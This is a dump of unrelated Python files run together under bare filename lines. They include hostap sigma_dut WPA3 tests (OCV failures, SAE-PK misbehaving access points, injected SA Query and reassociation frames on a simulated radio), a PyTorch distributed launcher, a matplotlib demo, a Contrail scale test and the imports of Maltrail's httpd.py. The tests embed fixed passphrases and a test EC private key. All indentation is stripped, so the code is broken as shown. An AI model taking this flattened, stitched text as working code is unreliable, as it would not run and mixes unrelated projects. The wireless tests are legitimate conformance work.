with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng,DOMAIN,aabb")
sigma_dut_cmd_check("ap_set_security,NAME,AP,AKMSuiteType,8;9,SAEPasswords,hello,PMF,Required")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
with open("/tmp/sigma_dut-ap.conf", "rb") as f:
with open(conffile, "wb") as f2:
f2.write(f.read())
dev[0].set("sae_groups", "")
dev[0].connect("test-sae", key_mgmt="FT-SAE", sae_password="hello",
ieee80211w="2", scan_freq="2412")
sigma_dut_cmd_check("ap_set_rfeature,NAME,AP,type,WPA3,ReassocResp_RSNXE_Used,1")
# This would need to be followed by FT protocol roaming test, but
# that is not currently convenient to implement, so for now, this
# test is based on manual inspection of hostapd getting configured
# properly.
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ocv(dev, apdev):
"""sigma_dut controlled STA using OCV"""
check_sae_capab(dev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params['sae_groups'] = '19'
params['ocv'] = '1'
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_wireless,interface,%s,program,WPA3,ocvc,1" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_wireless,interface,%s,program,WPA3,ocvc,1" % ifname)
sigma_dut_cmd_check("sta_set_rfeature,interface,%s,prog,WPA3,OCIFrameType,eapolM2,OCIChannel,11" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"))
ev = hapd.wait_event(["OCV-FAILURE"], timeout=1)
if ev is None:
raise Exception("OCV failure for EAPOL-Key msg 2/4 not reported")
if "addr=" + dev[0].own_addr() not in ev:
raise Exception("Unexpected OCV failure addr: " + ev)
if "frame=eapol-key-m2" not in ev:
raise Exception("Unexpected OCV failure frame: " + ev)
if "error=primary channel mismatch" not in ev:
raise Exception("Unexpected OCV failure error: " + ev)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_ocv(dev, apdev, params):
"""sigma_dut controlled AP using OCV"""
logdir = params['prefix'] + ".sigma-hostapd"
conffile = params['prefix'] + ".sigma-conf"
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,ocvc,1")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
bssid = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP")
bssid = bssid.split(',')[3]
with open("/tmp/sigma_dut-ap.conf", "rb") as f:
with open(conffile, "wb") as f2:
f2.write(f.read())
dev[0].set("sae_groups", "")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", ocv="1", scan_freq="2412")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].dump_monitor()
sigma_dut_cmd_check("ap_set_rfeature,NAME,AP,type,WPA3,OCIFrameType,eapolM3,OCIChannel,3")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", ocv="1", scan_freq="2412",
wait_connect=False)
check_ocv_failure(dev[0], "EAPOL-Key msg 3/4", "eapol-key-m3",
bssid)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].dump_monitor()
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_gtk_rekey(dev, apdev):
"""sigma_dut controlled STA requesting GTK rekeying"""
check_sae_capab(dev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params['sae_groups'] = '19'
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_wireless,interface,%s,program,WPA3,ocvc,1" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
sigma_dut_wait_connected(ifname)
dev[0].dump_monitor()
sigma_dut_cmd_check("dev_exec_action,interface,%s,program,WPA3,KeyRotation,1" % ifname)
ev = dev[0].wait_event(["WPA: Group rekeying completed"], timeout=5)
if ev is None:
raise Exception("GTK rekeying not seen")
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_gtk_rekey(dev, apdev, params):
"""sigma_dut controlled AP and requested GTK rekeying"""
logdir = params['prefix'] + ".sigma-hostapd"
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].set("sae_groups", "")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
dev[0].dump_monitor()
sigma_dut_cmd_check("dev_exec_action,name,AP,interface,%s,program,WPA3,KeyRotation,1" % iface)
ev = dev[0].wait_event(["WPA: Group rekeying completed"], timeout=5)
if ev is None:
raise Exception("GTK rekeying not seen")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_sae_pk(dev, apdev):
"""sigma_dut controlled STA using SAE-PK"""
check_sae_capab(dev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
ssid = "SAE-PK test"
pw = "hbbi-f4xq-b45g"
m = "d2e5fa27d1be8897f987f2d480d2af6b"
pk = "MHcCAQEEIAJIGlfnteonDb7rQyP/SGQjwzrZAnfrXIm4280VWajYoAoGCCqGSM49AwEHoUQDQgAEeRkstKQV+FSAMqBayqFknn2nAQsdsh/MhdX6tiHOTAFin/sUMFRMyspPtIu7YvlKdsexhI0jPVhaYZn1jKWhZg=="
try:
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params['sae_groups'] = '19'
params['sae_password'] = ['%s|pk=%s:%s' % (pw, m, pk)]
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_wireless,interface,%s,program,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2,sae_pk,1" % (ifname, ssid, pw))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, ssid),
timeout=10)
sigma_dut_wait_connected(ifname)
dev[0].dump_monitor()
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_ap_sae_pk(conffile, dev, ssid, pw, keypair, m, failure,
status=None, omit=False, immediate=False, sig=None):
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,%s,MODE,11ng" % ssid)
cmd = "ap_set_security,NAME,AP,AKMSuiteType,8,PairwiseCipher,AES-CCMP-128,GroupCipher,AES-CCMP-128,GroupMgntCipher,BIP-CMAC-128,PMF,Required,PSK,%s,sae_pk,1,Transition_Disable,1,Transition_Disable_Index,0,SAE_PK_KeyPair,%s,SAE_PK_Modifier,%s" % (pw, keypair, m)
if status is not None:
cmd += ",SAE_Commit_StatusCode,%d" % status
if omit:
cmd += ",SAE_PK_Omit,1"
if immediate:
cmd += ",SAE_Confirm_Immediate,1"
if sig:
cmd += ",SAE_PK_KeyPairSigOverride," + sig
sigma_dut_cmd_check(cmd)
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
bssid = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP")
bssid = bssid.split(',')[3]
with open("/tmp/sigma_dut-ap.conf", "rb") as f:
with open(conffile, "ab") as f2:
f2.write(f.read())
f2.write('\n'.encode())
dev.set("sae_groups", "")
dev.connect(ssid, key_mgmt="SAE", sae_password=pw, ieee80211w="2",
scan_freq="2412", wait_connect=False)
ev = dev.wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-SSID-TEMP-DISABLED"], timeout=15)
if ev is None:
raise Exception("No connection result reported")
bss = dev.get_bss(bssid)
if 'flags' not in bss:
raise Exception("Could not get BSS flags from BSS table")
if "[SAE-H2E]" not in bss['flags'] or "[SAE-PK]" not in bss['flags']:
raise Exception("Unexpected BSS flags: " + bss['flags'])
if failure:
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected connection")
dev.request("REMOVE_NETWORK all")
else:
if "CTRL-EVENT-CONNECTED" not in ev:
raise Exception("Connection failed")
dev.request("REMOVE_NETWORK all")
dev.wait_disconnected()
dev.dump_monitor()
sigma_dut_cmd_check("ap_reset_default")
def test_sigma_dut_ap_sae_pk(dev, apdev, params):
"""sigma_dut controlled AP using SAE-PK"""
logdir = params['prefix'] + ".sigma-hostapd"
conffile = params['prefix'] + ".sigma-conf"
check_sae_capab(dev[0])
tests = [("SAEPK-4.7.1.1", "ya3o-zvm2-r4so", "saepk1.pem",
"faa1ef5094bdb4cb2836332ca2c09839", False),
("SAEPK-4.7.1.2", "xcc2-qwru-yg23", "saepk1.pem",
"b1b30107eb74de2f25afd079bb4196c1", False),
("SAEPK-4.7.1.3", "skqz-6scq-zcqv", "saepk1.pem",
"4c0ff61465e0f298510254ff54916c71", False),
("SAEPK-4.7.1.4", "r6em-rya4-tqfa", "saepkP384.pem",
"fb811655209e9edf347a675ddd3e9c82", False),
("SAEPK-4.7.1.5", "6kjo-umvi-7x3w", "saepkP521.pem",
"cccb76bc0f113ab754826ba9538d66f5", False),
("SAEPK-5.7.1.1", "sw4h-re63-wgqg", "saepk1.pem",
"0d126f302d85ac809a6a4229dbbe3c75", False),
("SAEPK-5.7.1.2", "wewq-r4kg-4ioz-xb2p", "saepk1.pem",
"d6b1d8924b1a462677e67b3bbfe73977", False),
("SAEPK-5.7.1.3", "vb3v-5skk-5eft-v4hu-w2c5", "saepk1.pem",
"41f8cfceb96ebc5c8af9677d22749fad", False),
("SAEPK-5.7.1.4", "2qsw-6tgy-xnwa-s7lo-75tq-qggr", "saepk1.pem",
"089e8d4a3a79ec637c54dd7bd61972f2", False),
("SAE-PK test", "hbbi-f4xq-b45g", "saepkP256.pem",
"d2e5fa27d1be8897f987f2d480d2af6b", False),
("SAE-PK test", "hbbi-f4xq-b457-jje4", "saepkP256.pem",
"d2e5fa27d1be8897f987f2d480d2af6b", False),
("SAE-PK test", "hbbi-f4xq-b457-jjew-muei", "saepkP256.pem",
"d2e5fa27d1be8897f987f2d480d2af6b", False),
("SAE-PK test", "hbbi-f4xq-b457-jjew-muey-fod3", "saepkP256.pem",
"d2e5fa27d1be8897f987f2d480d2af6b", False),
("SAEPK-5.7.1.1", "sw4h-re63-wgqg", "saepk1.pem",
"0d126f302d85ac809a6a4229dbbe3c75", False),
("SAEPK-5.7.1.10", "tkor-7nb3-r7tv", "saepkP384.pem",
"af1a3df913fc0103f65f105ed1472277", False),
("SAEPK-5.7.1.11", "yjl3-vfvu-w6r3", "saepkP521.pem",
"24dadf9d253c4169c9647a21cb54fc57", False),
("SAEPK-5.7.2.1", "rntm-tkrp-xgke", "saepk1.pem",
"cd38ccce3baff627d09bee7b9530d6ce", False),
("SAEPK-5.7.2.2", "7lt7-7dqt-6abk", "saepk1.pem",
"a22fc8489932597c9e83de62dec02b21", False),
("SAEPK-5.7.2.3", "sw4h-re63-wgqg", "saepk2.pem",
"1f4a4c7d290d97e0b6ab0cbbbfa0726d", True),
("SAEPK-5.7.2.4", "rmj3-ya7b-42k4", "saepk1.pem",
"5f65e2bc37f8494de7a605ff615c8b6a", False),
("SAEPK-5.7.2.4", "rmj3-ya7b-42k4", "saepk2.pem",
"5f65e2bc37f8494de7a605ff615c8b6a", True),
("SAEPK-5.7.3", "4322-ufus-4bhm", "saepk1.pem",
"21ede99abc46679646693cafe4677d4e", False)]
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
for ssid, pw, keypair, m, failure in tests:
run_sigma_dut_ap_sae_pk(conffile, dev[0], ssid, pw, keypair, m,
failure)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_sae_pk_misbehavior(dev, apdev, params):
"""sigma_dut controlled AP using SAE-PK misbehavior"""
logdir = params['prefix'] + ".sigma-hostapd"
conffile = params['prefix'] + ".sigma-conf"
check_sae_capab(dev[0])
ssid = "SAEPK-4.7.1.1"
pw = "rmj3-ya7b-42k4"
keypair = "saepk1.pem"
m = "faa1ef5094bdb4cb2836332ca2c09839"
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
run_sigma_dut_ap_sae_pk(conffile, dev[0], ssid, pw, keypair, m,
True, status=126)
run_sigma_dut_ap_sae_pk(conffile, dev[0], ssid, pw, keypair, m,
True, omit=True)
run_sigma_dut_ap_sae_pk(conffile, dev[0], ssid, pw, keypair, m,
True, status=126, omit=True, immediate=True)
run_sigma_dut_ap_sae_pk(conffile, dev[0], ssid, pw, keypair, m,
True, sig="saepk2.pem")
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_ap_sae_pk_mixed(conffile, dev, ssid, pw, keypair, m, failure):
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,%s,MODE,11ng" % ssid)
cmd = "ap_set_security,NAME,AP,AKMSuiteType,2;8,PairwiseCipher,AES-CCMP-128,GroupCipher,AES-CCMP-128,GroupMgntCipher,BIP-CMAC-128,PMF,Required,PSK,%s,sae_pk,0,Transition_Disable,0" % (pw)
sigma_dut_cmd_check(cmd)
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
bssid = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP")
bssid = bssid.split(',')[3]
with open("/tmp/sigma_dut-ap.conf", "rb") as f:
with open(conffile, "ab") as f2:
f2.write(f.read())
f2.write('\n'.encode())
sigma_dut_cmd_check("ap_set_rfeature,NAME,AP,type,WPA3,Transition_Disable,1,Transition_Disable_Index,0")
dev[0].set("sae_groups", "")
dev[0].connect(ssid, key_mgmt="SAE", sae_password=pw, ieee80211w="2",
scan_freq="2412")
dev[1].connect(ssid, key_mgmt="WPA-PSK", psk=pw, ieee80211w="2",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
def test_sigma_dut_ap_sae_pk_mixed(dev, apdev, params):
"""sigma_dut controlled AP using SAE-PK(disabled) and PSK"""
logdir = params['prefix'] + ".sigma-hostapd"
conffile = params['prefix'] + ".sigma-conf"
check_sae_capab(dev[0])
ssid = "SAEPK-5.7.3"
pw = "4322-ufus-4bhm"
keypair = "saepk1.pem"
m = "21ede99abc46679646693cafe4677d4e"
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
run_sigma_dut_ap_sae_pk_mixed(conffile, dev, ssid, pw, keypair,
m, False)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_client_privacy(dev, apdev, params):
"""sigma_dut client privacy"""
logdir = params['logdir']
ssid = "test"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
addr = dev[0].own_addr()
sigma = start_sigma_dut(ifname)
try:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_wireless,interface,%s,program,WPA3,ClientPrivacy,1" % ifname)
cmd = "sta_scan,Interface,%s,ChnlFreq,2412,WaitCompletion,1" % dev[0].ifname
sigma_dut_cmd_check(cmd, timeout=10)
time.sleep(2)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_psk,interface,%s,ssid,%s,passphrase,%s,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, ssid, "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, ssid),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
dev[0].set("mac_addr", "0", allow_fail=True)
dev[0].set("rand_addr_lifetime", "60", allow_fail=True)
dev[0].request("MAC_RAND_SCAN enable=0 all")
dev[0].set("preassoc_mac_addr", "0", allow_fail=True)
dev[0].set("gas_rand_mac_addr", "0", allow_fail=True)
dev[0].set("gas_rand_addr_lifetime", "60", allow_fail=True)
out = run_tshark(os.path.join(logdir, "hwsim0.pcapng"),
"wlan.addr == " + addr,
display=["wlan.ta"])
res = out.splitlines()
if len(res) > 0:
raise Exception("Permanent address used unexpectedly")
def test_sigma_dut_wpa3_inject_frame(dev, apdev):
"""sigma_dut and WPA3 frame inject"""
check_sae_capab(dev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params["ocv"] = "1"
params['sae_groups'] = '19 20 21'
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_wireless,interface,%s,program,WPA3,ocvc,1" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd("dev_send_frame,interface,%s,program,WPA3,framename,SAQueryReq,OCIChannel,2" % ifname)
sigma_dut_cmd("dev_send_frame,interface,%s,program,WPA3,framename,SAQueryReq,OCIChannel,1" % ifname)
sigma_dut_cmd("dev_send_frame,interface,%s,program,WPA3,framename,ReassocReq" % ifname)
hwsim_utils.test_connectivity(dev[0], hapd)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
|
distributed.py
|
import os
import sys
current_path = os.path.dirname(os.path.realpath(__file__))
root_path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
sys.path.append(root_path)
import signal
import threading
import torch
import experiments.options as options
from experiments.train import main as single_process_main
def main():
args = options.parse_distributed_args()
args_dict = vars(args)
nproc_per_node = args_dict.pop('nproc_per_node')
nnodes = args_dict.pop('nnodes')
node_rank = args_dict.pop('node_rank')
# world size in terms of number of processes
dist_world_size = nproc_per_node * nnodes
# set PyTorch distributed related environmental variables
current_env = os.environ
current_env["MASTER_ADDR"] = args_dict.pop('master_addr')
current_env["MASTER_PORT"] = str(args_dict.pop('master_port'))
current_env["WORLD_SIZE"] = str(dist_world_size)
batch_size = args.batch_size // dist_world_size
args.batch_size = batch_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
processes = []
for local_rank in range(0, nproc_per_node):
# each process's rank
dist_rank = nproc_per_node * node_rank + local_rank
args.rank = dist_rank
args.local_rank = local_rank
process = mp.Process(target=run, args=(args, error_queue, ), daemon=False)
process.start()
error_handler.add_child(process.pid)
processes.append(process)
for process in processes:
process.join()
def run(args, error_queue):
try:
single_process_main(args)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.rank, traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
self.children_pids.append(pid)
def error_listener(self):
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = "\n\n-- Tracebacks above this line can probably be ignored --\n\n"
msg += original_trace
raise Exception(msg)
if __name__ == "__main__":
main()
|
draw_device_test.py
|
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import threading
from time import sleep
count = 0
def wrapper():
global count
while True:
print(count)
count += 1
sleep(1)
def main():
read_thread = threading.Thread(target=wrapper,daemon = True)
read_thread.start()
plt.figure()
plt.axis([0, 10, 0, 10])
while True:
plt.cla()
plt.scatter(count, count, color='k', label = 'count')
plt.legend(loc=4)
plt.pause(0.05)
# fig = plt.figure()
# #creating a subplot
# ax1 = fig.add_subplot(1,1,1)
# ax1.set_ylim(0, 60)
# def animate(i,ax1):
# ax1.clear()
# ax1.plot([0,i,2*i],[20,40,60])
# plt.xlabel('time')
# plt.ylabel('temperature')
# plt.title('plot')
# animation.FuncAnimation(fig, animate, fargs=(ax1), interval=1000)
# animate(1)
plt.show()
if __name__ == '__main__':
main()
|
test_sub.py
|
from common.base import GenericTestBase
from tcutils.wrappers import preposttest_wrapper
import test
from heat_test import HeatStackFixture
from nova_test import *
from vm_test import *
from jinja2 import Environment, FileSystemLoader
import yaml
from port_fixture import PortFixture
from ipaddress import IPv4Network
from multiprocessing import Process
import os
class TestSubInterfaceScale(GenericTestBase):
@classmethod
def setUpClass(cls):
super(TestSubInterfaceScale, cls).setUpClass()
# Can update deployment path based on variable.
cls.template_path = os.getenv('DEPLOYMENT_PATH',
'serial_scripts/scale/sub_interface/template')
cls.env = Environment(loader=FileSystemLoader(cls.template_path))
cls.num = 4094
cls.num_per_file = 50
cls.cidr = "97.27.0.0/16"
try:
cls.generate_network_objects()
except Exception as e:
cls.logger.error(e)
cls.vnc_check()
cls.port_stack.cleanUp()
cls.vsrx_stack.cleanUp()
super(TestSubInterfaceScale, cls).tearDownClass()
@classmethod
def tearDownClass(cls):
cls.port_stack.cleanUp()
cls.vsrx_stack.cleanUp()
super(TestSubInterfaceScale, cls).tearDownClass()
@classmethod
def vnc_check(cls):
actual_vmis = cls.vnc_lib.virtual_machine_interface_read(
id=cls.port_uuid).virtual_machine_interface_refs
assert actual_vmis == cls.num, 'Desired number is not equal to actual number Created'
@classmethod
def setup_port(cls):
cls.port_file = '{}/port.yaml'.format(cls.template_path)
with open(cls.port_file, 'r') as fd:
cls.port_template = yaml.load(fd, Loader=yaml.FullLoader)
cls.port_stack = HeatStackFixture(
connections=cls.connections,
stack_name=cls.connections.project_name+'_port_scale',
template=cls.port_template,
timeout_mins=15)
cls.port_stack.setUp()
op = cls.port_stack.heat_client_obj.stacks.get(
cls.port_stack.stack_name).outputs
cls.port_uuid = op[0]['output_value']
@classmethod
def setup_vsrx(cls):
cls.nova_h.get_image('vsrx')
cls.nova_h.get_flavor('contrail_flavor_2cpu')
vsrx_temp = cls.env.get_template("vsrx.yaml.j2")
cls.vsrx_file = '{}/vsrx.yaml'.format(cls.template_path)
with open(cls.vsrx_file, 'w') as f:
f.write(vsrx_temp.render(uuid=cls.port_uuid))
with open(cls.vsrx_file, 'r') as fd:
cls.vsrx_template = yaml.load(fd, Loader=yaml.FullLoader)
cls.vsrx_stack = HeatStackFixture(
connections=cls.connections,
stack_name=cls.connections.project_name+'_vsrx_scale',
template=cls.vsrx_template,
timeout_mins=15)
cls.vsrx_stack.setUp()
op = cls.vsrx_stack.heat_client_obj.stacks.get(
cls.vsrx_stack.stack_name).outputs
cls.vsrx_id = op[0]['output_value']
vsrx = VMFixture(connections=cls.connections,
uuid=cls.vsrx_id, image_name='vsrx')
vsrx.read()
vsrx.verify_on_setup()
@classmethod
def call_heat_stack_with_template(cls, sub_intf_file, sub_intf_temp, start_index, end_index):
with open(sub_intf_file, 'w') as f:
f.write(sub_intf_temp.render(start_index=start_index, end_index=end_index,
sub_intf_nets=cls.sub_intf_nets, sub_intf_masks=cls.sub_intf_masks, ips=cls.ips, uuid=cls.port_uuid))
with open(sub_intf_file, 'r') as fd:
sub_template = yaml.load(fd, Loader=yaml.FullLoader)
sub_stack = HeatStackFixture(connections=cls.connections, stack_name=cls.connections.project_name +
'_sub_scale{}'.format(start_index), template=sub_template, timeout_mins=120)
sub_stack.setUp()
return sub_stack
@classmethod
def setup_sub_intfs(cls):
sub_intf_temp = cls.env.get_template("sub_bgp.yaml.j2")
# Logic for number of files
perfect_num = cls.num // cls.num_per_file
partial_num = cls.num % cls.num_per_file
def multiple_stacks(i):
start_index = i * cls.num_per_file
end_index = (i+1) * cls.num_per_file
sub_intf_file = '{}/sub_bgp_stack{}.yaml'.format(
cls.template_path, i)
sub_intf_stack = cls.call_heat_stack_with_template(
sub_intf_file, sub_intf_temp, start_index, end_index)
# Doing multiprocessing here
procs = []
for i in range(perfect_num):
proc = Process(target=multiple_stacks, args=(i,))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
# For the last partial file
if partial_num != 0:
start_index = perfect_num * cls.num_per_file
end_index = start_index + partial_num
sub_intf_file = '{}/sub_bgp_stack{}.yaml'.format(
cls.template_path, perfect_num)
sub_intf_stack = cls.call_heat_stack_with_template(
sub_intf_file, sub_intf_temp, start_index, end_index)
@classmethod
def generate_network_objects(cls):
cidr = IPv4Network(cls.cidr)
cls.ips = []
cls.neighbor1_list = []
cls.neighbor2_list = []
cls.sub_intf_nets = []
cls.sub_intf_masks = []
cls.sub_mask = 28
cls.local_as = 64500
for n, sn in enumerate(cidr.subnets(new_prefix=cls.sub_mask)):
if n == cls.num:
break
sub_intf_cidr = IPv4Network(sn)
sub_intf_net = str(sub_intf_cidr.network_address)
sub_intf_mask = sub_intf_cidr.prefixlen
cls.sub_intf_nets.append(sub_intf_net)
cls.sub_intf_masks.append(sub_intf_mask)
for i, ip in enumerate(sub_intf_cidr):
if i == 0:
continue
elif i == 1:
cls.neighbor1_list.append(ip)
elif i == 2:
cls.neighbor2_list.append(ip)
elif i == 3:
cls.ips.append(ip)
else:
break
@test.attr(type=['sub_intf_scale'])
@preposttest_wrapper
def test_sub_interface_scale(self):
'''
Description: Test to scale 4094 sub-interfaces and validate it
Test steps:
1. Create port
2. Create sub-interfaces for that port
3. Attach port to vsrx and validate it
4. Also validate number of sub-interfaces created through vnc api
Pass criteria: 4094 sub-interfaces should be present
Maintainer : [email protected]
'''
self.setup_port()
self.setup_sub_intfs()
self.setup_vsrx()
self.vnc_check()
|
httpd.py
|
#!/usr/bin/env python2
"""
Copyright (c) 2014-2019 Maltrail developers (https://github.com/stamparm/maltrail/)
See the file 'LICENSE' for copying permission
"""
import BaseHTTPServer
import cStringIO
import datetime
import httplib
import glob
import gzip
import hashlib
import io
import json
import mimetypes
import os
import re
import socket
import SocketServer
import subprocess
import threading
import time
import traceback
import urllib
import urlparse
from core.addr import addr_to_int
